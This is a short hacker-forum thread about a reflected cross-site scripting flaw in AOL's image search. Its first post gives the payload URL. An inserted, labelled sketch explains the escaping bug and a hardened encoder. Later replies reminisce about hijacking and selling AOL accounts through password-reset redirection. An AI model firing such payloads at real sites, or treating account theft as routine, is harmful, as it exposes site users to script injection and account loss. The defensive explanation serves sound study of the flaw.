search.aol.com - XSS
#1
Code:
http://search.aol.com/aol/image?q=\');alert(document.domain);//&v_t=na&s_it=searchtabs

Click 'web' to trigger :)
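Added example, not part of the original thread and not AOL's code: the leading backslash in the `q` value from post #1 is what you would expect to work against a page that reflects `q` into a single-quoted inline JavaScript string and escapes only the quote character. That root cause is an assumption (the thread does not show the page source); `setQuery`, `renderCall` and the helper names are hypothetical. The sketch puts the weak escaping beside a hardened encoder and checks whether the value stays inside the string literal.

```javascript
// Value of the q parameter from the URL in post #1 (URL-decoded).
const PAYLOAD = "\\');alert(document.domain);//";

// Assumed weak pattern: only the quote is escaped. A backslash supplied by
// the user then escapes the backslash the filter adds, freeing the quote.
function escapeQuoteOnly(s) {
  return s.replace(/'/g, "\\'");
}

// Hardened: encode every character that can end or alter a JS string
// literal, or end the enclosing <script> element, as a \uXXXX escape.
function escapeForJsString(s) {
  return s.replace(/[\\'"<>&\u2028\u2029\r\n]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hypothetical template: the search term is reflected into inline script.
function renderCall(escape, q) {
  return "setQuery('" + escape(q) + "');";
}

// Walk the generated source from the opening quote, honouring backslash
// escapes, and report whether the literal closes only where the template
// intended (immediately before the final ");").
function staysInsideLiteral(js) {
  const start = js.indexOf("'") + 1;
  for (let i = start; i < js.length; i++) {
    if (js[i] === "\\") { i++; continue; } // skip the escaped character
    if (js[i] === "'") return js.slice(i) === "');";
  }
  return false; // literal never terminated
}

for (const [name, fn] of [["quote-only", escapeQuoteOnly],
                          ["hardened", escapeForJsString]]) {
  const out = renderCall(fn, PAYLOAD);
  console.log(name.padEnd(10), staysInsideLiteral(out), out);
}
```

Output encoding for the JavaScript-string context is the fix at the reflection point; a Content-Security-Policy that disallows inline script limits the impact if an encoder is missed elsewhere.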
#2
REALLY?! That is insane. Sometimes I wonder how these places stay online. I mean AOL just a handful of years ago allowed the redirection of password reset emails with a simple tamper data.

They need to fire some devs haha
#3
(12-24-2015, 09:49 PM)NO-OP Wrote: REALLY?!  That is insane.  Sometimes I wonder how these places stay online.  I mean AOL just a handful of years ago allowed the redirection of password reset emails with a simple tamper data.

They need to fire some devs haha

Oh shit is that how some people sold a shitton of OG aols?
#4
(12-29-2015, 05:37 AM)kingofsalt Wrote:
(12-24-2015, 09:49 PM)NO-OP Wrote: REALLY?!  That is insane.  Sometimes I wonder how these places stay online.  I mean AOL just a handful of years ago allowed the redirection of password reset emails with a simple tamper data.

They need to fire some devs haha

Oh shit is that how some people sold a shitton of OG aols?

This was from a while ago maybe about 5-7 years. But it was a great way to hijack accounts and sell them.
#5
(12-29-2015, 08:07 PM)NO-OP Wrote:
(12-29-2015, 05:37 AM)kingofsalt Wrote:
(12-24-2015, 09:49 PM)NO-OP Wrote: REALLY?!  That is insane.  Sometimes I wonder how these places stay online.  I mean AOL just a handful of years ago allowed the redirection of password reset emails with a simple tamper data.

They need to fire some devs haha

Oh shit is that how some people sold a shitton of OG aols?

This was from a while ago maybe about 5-7 years.  But it was a great way to hijack accounts and sell them.

I remember this, lol.
mail.com was actually vuln to something similar not long ago.